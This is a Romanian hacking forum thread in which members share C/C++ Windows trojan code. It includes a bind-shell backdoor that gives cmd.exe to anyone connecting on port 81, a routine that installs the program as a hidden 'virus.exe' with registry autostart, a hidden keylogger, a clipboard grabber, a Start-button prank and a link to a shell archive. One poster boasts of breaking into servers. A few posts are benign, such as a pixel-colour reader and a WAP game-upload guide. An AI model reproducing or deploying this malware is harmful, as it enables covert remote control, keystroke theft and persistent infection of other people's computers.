SlicK

Cum se face un backdoor in windows care sa astepte conexiuni pe un anumit port si la conectare sa ofere "cmd.exe" bool Backdoor() { WSADATA wsd; SOCKET s1,s2; // socketurile struct sockaddr_in sockadd; int len=sizeof(sockadd); STARTUPINFO SI; PROCESS_INFORMATION PI; sockadd.sin_family=AF_INET; sockadd.sin_port=htons(81); // portul pe care sa asculte sockadd.sin_addr.s_addr=htonl(INADDR_ANY); // localhost if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) return false; // initiem WinSocket s1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0); // creem socketul if(bind(s1,(struct sockaddr *)&sockadd,len)!=0) return false; // asociem socketul adresei locale if(listen(s1,5)==SOCKET_ERROR) return false; // setam soketul sa asculte while(1) { if((s2=accept(s1,(struct sockaddr *)&sockadd,&len))==INVALID_SOCKET) return false; // socketul clientului ZeroMemory(&SI,sizeof(SI)); ZeroMemory(&PI,sizeof(PI)); SI.cb = sizeof(SI); SI.dwFlags=STARTF_USESTDHANDLES; SI.hStdError=(HANDLE)s2; SI.hStdInput=(HANDLE)s2; SI.hStdOutput=(HANDLE)s2; CreateProcess(NULL,"cmd",NULL,NULL,1,0,NULL,NULL,&SI,&PI); // creem procesul "cmd.exe" WaitForSingleObject(PI.hProcess,INFINITE); // asteapta pana la terminarea procesului closesocket(s2); // inchidem socketul clientului } return true; } Exemplu de folosire #include <windows.h> #include <winsock.h> bool Backdoor() { // mai sus } int main() { CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&Backdoor,NULL,0,NULL); // creem un thread separat pentru functia backdoor pentru ca programul sa continue normal // restul programului } IMPORTANT: trebuie sa adaugati libraria WINSOCK la proiect(Dev-C++:libws2_32.a)

Mersi! You really keep me going :@

Ascunde butonul START al windowsului void HideStart(bool hide) { HWND hwnd=FindWindowEx(FindWindow("Shell_TrayWnd",NULL),NULL,"Button","Start"); if(hide==true) ShowWindow(hwnd,false); else ShowWindow(hwnd,true); } Cum se foloseste? HideStart(true) ascunde butonul iar HideStart(false) arata butonul. Exemplu: Ascunde si arata butonul la un interval de 100 milisecunde #include <windows.h> void HideStart(bool hide) { HWND hwnd=FindWindowEx(FindWindow("Shell_TrayWnd",NULL),NULL,"Button","Start"); if(hide==true) ShowWindow(hwnd,false); else ShowWindow(hwnd,true); } int main() { bool hide=true; for(int i=1 ; i<100 ; i++) { if(hide==true) hide=false; else hide=true; HideStart(hide); Sleep(100); } return(0); }

Acest cod extrage si afiseaza textul din clipboard la apsarea combinatie de taste CTRL+C PS: in afara unui trojan nu este prea folositor #include <windows.h> #include <stdio.h> int main() { while(1) { Sleep(10); if(GetAsyncKeyState(VK_CONTROL)<0 && GetAsyncKeyState(67)==-32767) // la apasarea combinatie de taste CTRL+C { char *buffer; //pentru stocarea continutului clipboardului if(OpenClipboard(NULL)) // deschidem clipboardul { buffer=(char*)GetClipboardData(CF_TEXT); // extragem textul din clipboard printf("%sn==============================n",buffer); // afisam textul } CloseClipboard(); // inchidem clipboardul } } return 0; }

Cum puteti afla culoarea RGB a oricarui punct de pe ecran. #include <windows.h> #include <stdio.h> #include <wingdi.h> // GetPixel() int main() { COLORREF culoarea; // culoarea punctului POINT punct; // pozitia cursorului HDC dc=GetDC(NULL); // device contextul desktopului while(1) // loop infinit { Sleep(10); // evitam supraincarcarea procesorului if(GetAsyncKeyState(VK_SPACE)==-32767) // la apsarea tastei SPACE { GetCursorPos(&punct); // aflam pozitia cursorului pe ecran culoarea=GetPixel(dc,punct.x,punct.y); // aflam culoarea punctului unde se afla cursorul printf("R=%i ", GetRValue(culoarea)); // afisam valoarea ROSULUI printf("G=%i ", GetGValue(culoarea)); // afisam valoarea VERDELUI printf("B=%in",GetBValue(culoarea)); // afisam valoarea ALBASTRULUI } if(GetAsyncKeyState(VK_ESCAPE) ==-32767) // la apsarea tastei ESCAPE { return(0); // inchidem programul } } } IMPORTANT: nu uiatati sa includeti libraria GDI (in proiectul Dev-C++: ALT+P>Parameters>Add Library or Object>[directorul dev-c++]/lib/libgdi32.a) La rulare plasati cursorul pe punctul caruia vreti sa-i aflati culoarea si apasati SPACE.Pentru iesire apasati ESCAPE sau click pe [X] Have fun

Da. "VirName" e o variabila care contine calea completa a troianului in directorul windows.

BAN

Pai ce fel de bot iti trebuie ca nu am inteles, de Linux de Windows...Si ce sa flodezi Mirc,Yahoo,etc... ???

Cum sa facem ca trojanul nostru sa se instaleze in directorul windowsului si sa ruleze automat la startup. #include <windows.h> #include <stdio.h> bool Install() { char FileName[MAX_PATH]; // pentru stocarea caii fisierului curent char VirName[100]; // pentru stocarea cai troianului HINSTANCE hInstance=GetModuleHandle(NULL); // handle-ul instantei curente GetModuleFileName(hInstance, FileName, MAX_PATH); // obtinem numele fisierului curent GetWindowsDirectory(VirName,100); //obtinem calea catre directorul windows (poate fi diferit de C:WINDOWS ) strcat(VirName,"\virus.exe"); // obtinem calea pe care o va avea troianul pe parcursul vietii sale (evident schimbati numele "virus.exe") char lszValue[255]; // valoarea date din stringul urmaind a fi creeat in registrii HKEY hKey; // cheia din registrii LONG status; // pentru detectarea erorilor DWORD dwType=REG_SZ; // tipul datelor stocate in stringul din registrii DWORD dwSize=sizeof(VirName); //marimea valorii stringului status=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run",0L,KEY_ALL_ACCESS,&hKey); //dechidem cheia din registrii if(status==ERROR_SUCCESS) { status=RegQueryValueEx(hKey,"Porneste Virusul",NULL,&dwType,(LPBYTE)&lszValue,&dwSize); // verificam daca exista deja un string cu acelasi nume if (status!=ERROR_SUCCESS) { if(CopyFile(FileName,VirName,FALSE)!=0) // copiem fisierul curent in directul windowsului cu numele specificat mai sus { SetFileAttributes(VirName,FILE_ATTRIBUTE_HIDDEN); // facem fisierul ascuns status=RegSetValueEx(hKey,"Porneste Virusul",0,REG_SZ,(const unsigned char*)VirName,dwSize); // creem un string cu valoarea numelui troianul if(status==ERROR_SUCCESS) { RegCloseKey(hKey); // inchidem cheia return true; // totul e ok }// else: nu am putut scrie in registrii }// else: troianul se afla deja in windows,mai exista un fisier cu acelasi nume sau nu avem permisiune de scriere }// else: exista deja o valoare cu acelasi nume RegCloseKey(hKey); // inchidem cheia }//else: nu am putut deschide cheia din registrii return false; //ceva a mers prost sau troianul e deja instalat } int main() { if(Install()==true) // daca instalarea a reusit { exit(0); // iesim si asteptam restartarea calculatorului, fisierul curent nu mai este folosit la nimic } else // daca nu a reusit (probabil troianul este deja instalat) { // continuam programul } return 0; } Sper sa fie usor de inteles pentru ca arata cam aiurea la 'Previzualizeaza" To be continued...

Ce este si cum se poate folosi "for fun and profit" Sper sa va foloseasca! http://www.rootb0x.com/cbshell.rar PS: Daca am omis/gresit ceva va rog fara flame-uri

Da eu l-am facut mai de mult acum doar i-am adugat comentariile. API-urile GetAsyncKeyState(),MapVirtualKeyEx() si GetKeyNameText() le-am gasit pe MSDN

Un exepmplu foarte simplu despre cum sa iti faci propriul keylogger in C++. Sunt foarte multe multe coduri aproape identice cu acesta pe net dar este foarte bun pentru incepatori. #include <windows.h> #include <stdio.h> int main() { AllocConsole(); //alocam o consola ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0); //ascundem consola de user FILE *Log; short key; char szKey[MAX_PATH]; int scan; while(1) // loop infinit { Sleep(10); //pentru a evita "CPU Usage 100%" for(key=0;key<256;key++) //incercam toate codurile tastelor { if(GetAsyncKeyState(key)==-32767) //o tasta este apasata { scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0)); //traducem codul tastei GetKeyNameText(scan << 16,szKey,MAX_PATH); //numele tastei Log=fopen ("log.txt","a+"); // deschidem fisierul fprintf(Log,"[%s]",szKey); //scriem numele tastei in log fclose(Log); //inchidem fisierul } } } } Eu personal l-am compilat cu Dev-C++ dar puteti incerca cu orice alt compilator C++. Daca va da o eroare adaugati "#include <iostream>" sau "#include <iostream.h>" Sper sa il intelegeti pentru ca mai tarziu o sa postez despre tehnici mai avansate legate de trojane

Daca telefonul are wap(mi-e lene sa caut pe google pt ca nu il cunosc) poti sa faci asa: -De obicei jocurile java au 2 fisiere, un *.jad (descriere) si un *.jar (jocul propriuzis). daca jocul tau nu are *.jad iti iei JadMaker(google for it) -FF important: cele 2 fisiere(.jad si .jar) treuie sa aiba acelasi nume deci nu trebuie redenumite.daca totusi ai facut asta refa fisierul .jad cu JadMakerul -Pana aici ar trebui sa ai: joculmeu.jad si joculmeu.jar (doar un exemplu) -Iti faci un cont la http://www.lx.ro (nu e reclama) e gratis -sa zicem ca ti-ai luat domeniul -de'>http://www.jocurilemele.lx.ro -de duci la http://www.web2ftp.com sau http://www.net2ftp.com (ca sa fie mai simplu) -te loghezi cu userul so parola pe care ti-o dau ei si upoadezi cele 2 fisiere -pe calcul tau creezi un fisier text numit "index.wml" (un fel de index.html pt wap) -in index.wml scrii <?xml version="1.0"?> <wml> <card id="main" title="Jocurile mele"> [url="joculmeu.jad"]JoculMeu[/url] </card> </wml> -il uploadezi si pe asta pe domeniul tau -daca ai deja access wap pe telefon e perfect daca nu.. iti iei o cartela orange si activezi optiunea wap unlimited(*100# pe acolo) -acum pur si simplu deschizi browserul wap si te duci la adresa "http://www.jocurilemele.lx.ro/index.wml" si selectezi "JoculMeu" -o modalitate mai simpla ar fi sa deschizi in browser "http://www.jocurilemele.lx.ro/joculmeu.jad" dar mie nu imi merge decat cu index.wml

Salut tuturor de pe forum. Sunt un nou venit aici si deja imi pare rau ca nu am gasit saitu asta mai devreme. Ma bucur ca am dat si eu in sfarsit de un forum in romana, nu ca nu as stii engelza dar parca e mai frumos cand poti sa scrii in limba ta (se poate sa fi facut niste greseli ca nu am dormit de 20 de ore) Ma cred si eu un fel de "hacker".... adica mai sparg cate un server doua din cand in cand dar mai mult pentru thrill! Programez de ceva timp in C (linux/win32),perl,putin php/html....in fine am idee cu ce se mananca si altele dar nu am chef sa le mai insir ca e ora 4:30 Ar fi ff tare daca ar avea forumul si un topic despre virusi/trojane pt ca in ultima vreme cam asta ma intreseaza si din pacate nu prea am gasit romani interesati de asta(majoritatea sunt:"frate vreau sa fiu si eu hacker sa am multi boti pe mirc" no offense anyone). daca va intereseaza ym:ydotgov (stiu stiu 'lame' dar toate id-urile bune sunt luate) In rest cred ca o sa cam stau aici ca-mi place tema asta "dark"